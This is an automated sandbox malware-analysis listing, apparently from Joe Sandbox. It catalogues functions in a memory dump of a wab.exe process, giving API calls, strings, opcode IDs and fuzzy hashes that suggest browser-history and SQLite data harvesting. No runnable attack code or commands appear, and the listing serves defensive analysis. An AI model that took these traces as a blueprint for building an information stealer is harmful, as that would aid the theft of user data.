                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@AttributesFilememset
                                                              • String ID:
                                                              • API String ID: 776155459-0
                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                              Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 2308052813-0
                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                              Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PathTemp$??3@
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 1589464350-1420421710
                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                              Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040FDD5
                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 1775345501-2769808009
                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                              Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0041477F
                                                              • wcscpy.MSVCRT ref: 0041479A
                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                              • String ID: General
                                                              • API String ID: 999786162-26480598
                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                              Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastMessage_snwprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 313946961-1552265934
                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                              Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foreign key constraint failed$new$oid$old
                                                              • API String ID: 0-1953309616
                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                              Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                              Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                              Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                              • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                              Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 2903831945-0
                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                              Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                              Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                              Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$??3@
                                                              • String ID: g4@
                                                              • API String ID: 3314356048-2133833424
                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _memicmpwcslen
                                                              • String ID: @@@@$History
                                                              • API String ID: 1872909662-685208920
                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                              Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcsicmpmemset
                                                              • String ID: edit
                                                              • API String ID: 2747424523-2167791130
                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                              Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 3150196962-1506664499
                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                              Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
